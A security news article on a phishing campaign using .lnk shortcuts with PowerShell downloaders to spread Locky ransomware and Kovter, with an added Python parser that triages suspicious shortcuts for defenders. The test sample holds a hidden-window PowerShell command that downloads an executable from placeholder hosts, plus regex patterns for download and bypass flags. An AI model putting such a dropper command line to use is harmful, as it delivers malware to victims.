Researchers at Microsoft’s Malware Protection Center have spotted malicious email campaigns using .lnk attachments to spread Locky ransomware and the Kovter click-fraud Trojan, the first time criminals have simultaneously distributed both pieces of malware.
According to Microsoft, the .lnk file now carries a potent script that contains links to multiple hardcoded domains from which it attempts to download either piece of malware. A .lnk file is a Windows shortcut file that points to an executable. In this case, email recipients receive a .zip archive attachment containing a .lnk file that hides a versatile PowerShell script.
“This new script has no less than five different hardcoded domains from which it attempts to download the payload malware. In addition to Locky, this script also now downloads Kovter,” wrote Microsoft in a blog post explaining its research.
In October, Microsoft spotted cybercriminals switching from using malicious .wsf files in spam campaigns to ones using shortcut files (.lnk extension) that contain PowerShell commands to download and run Locky. At the time, Microsoft said this was notable because it signaled a strategy change by crooks who had been previously relying on the Trojan downloader Nemucod to distribute Locky.
In this most recent campaign, emails carrying the .lnk file (inside the .zip archive) attempt to trick recipients into opening the .zip file by posing as a delivery receipt from a spoofed U.S. Postal Service email. If the .zip file is opened and the .lnk shortcut file is executed, a PowerShell script is initiated, Microsoft said.
“The script contains the hardcoded domains and the parameters it uses for the download routine. For each attempt to download, it checks if the download is successful and if the downloaded file is at least 10KB. It stops trying to download when these conditions are met, or when it has gone through the five domains twice with no successful download,” wrote the Microsoft Malware Protection Center team.
The use of multiple domains is an obfuscation technique intended to throw off URL-filtering security solutions, Microsoft said. Instead of relying on a single URL that may be blacklisted, the script increases its odds of success by adding additional domains. “All the script needs is one URL that is not blocked in order to successfully download malware,” Microsoft wrote.
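The shortcut described above is only a container: the PowerShell command line sits in the .lnk file's COMMAND_LINE_ARGUMENTS string, so a defender can triage such attachments without executing them by parsing the Shell Link structure and inspecting that string for the traits Microsoft describes (PowerShell as the target, download calls, several distinct hardcoded domains, hidden-window flags). The following Python is an added example written for this article, not code from Microsoft or Threatpost; it implements a minimal MS-SHLLINK parser and a heuristic triage, and the sample shortcut it builds (with reserved `.example` hostnames and placeholder paths) is constructed here purely to exercise the checks.

```python
import re
import struct
import uuid

# CLSID that every Shell Link (.lnk) header must carry (MS-SHLLINK 2.1)
SHELL_LINK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")

# LinkFlags bits from the MS-SHLLINK specification
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag bit is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, arguments, ...) of a .lnk file."""
    header_size, clsid_raw, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=clsid_raw) != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the optional IDList block
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip the optional LinkInfo block
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:
            fields[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


URL_RE = re.compile(r"https?://[^\s'\"`,;)]+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Net\.WebClient|Invoke-WebRequest|BitsTransfer", re.I)
STEALTH_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecutionpolicy|p)\s+bypass|-enc(odedcommand)?\b", re.I)


def triage_lnk(data: bytes) -> dict:
    """Flag a shortcut that launches PowerShell with a multi-domain download command line."""
    fields = parse_lnk(data)
    cmd = fields.get("arguments", "")
    target = (fields.get("relative_path", "") + " " + cmd).lower()
    findings = []
    if "powershell" in target:
        findings.append("powershell launched from shortcut")
    # distinct hostnames give a rough count of hardcoded download domains
    domains = sorted({u.split("/")[2].lower() for u in URL_RE.findall(cmd)})
    if len(domains) >= 2:
        findings.append(f"{len(domains)} distinct download domains")
    if DOWNLOAD_RE.search(cmd):
        findings.append("download cmdlet/API in command line")
    if STEALTH_RE.search(cmd):
        findings.append("hidden window / policy bypass flags")
    return {"fields": fields, "domains": domains, "findings": findings,
            "suspicious": len(findings) >= 2}


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk (no IDList, no LinkInfo) for testing the parser."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, SHELL_LINK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, times, size, icon, SW_SHOWNORMAL
    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample mimicking the campaign's shape: hidden PowerShell, a list of
# hardcoded URLs and a download call. Hostnames use the reserved .example TLD.
SAMPLE_ARGS = (
    "-NoProfile -WindowStyle Hidden -Command \""
    "$u='http://dl-one.example/p.php','http://dl-two.example/p.php','http://dl-three.example/p.php';"
    "(New-Object Net.WebClient).DownloadFile($u[0],$env:TEMP+'\\a.exe')\""
)
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "readme.txt")

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        result = triage_lnk(blob)
        print(label, "suspicious" if result["suspicious"] else "clean", result["findings"])
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks rather than decoding them, because for this campaign the interesting content is the argument string; a production tool would also read the EXTRA_DATA blocks (for example the EnvironmentVariableDataBlock, which can hide the real target) and should treat any shortcut whose target is a script interpreter as worth a second look regardless of URL count.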
Additionally, cybercriminals “have the option to update the malware payload pointed to by the URLs, change the URLs in the script, or do both to try and evade detection,” according to Microsoft.
Since it began tracking the campaign, Microsoft notes, cybercriminals have updated the payload downloaded by the PowerShell script, sometimes on a daily basis. “During our testing, the malware payload was updated with newer versions of either Locky and Kovter, but technically the attackers can change this to any malware they wish to use,” it wrote.
To Microsoft, Locky and Kovter’s shared distribution suggests that the cybercriminals behind the attacks may also be selling or renting servers as a pay-per-install service.
This is not the first time security researchers have seen Locky and Kovter so closely associated within a campaign. Last month, PhishMe researchers spotted an email campaign that used a similar .zip archive containing an obfuscated JScript file capable of downloading Kovter and Locky from compromised Joomla websites.
To avoid falling prey, Microsoft suggests that Windows 10 users lock down PowerShell version 5 to “Constrained Mode.” This limits the extended language features that can lead to unverifiable code execution, such as direct .NET scripting, invocation of Win32 APIs via the Add-Type cmdlet, and interaction with COM objects, Microsoft said.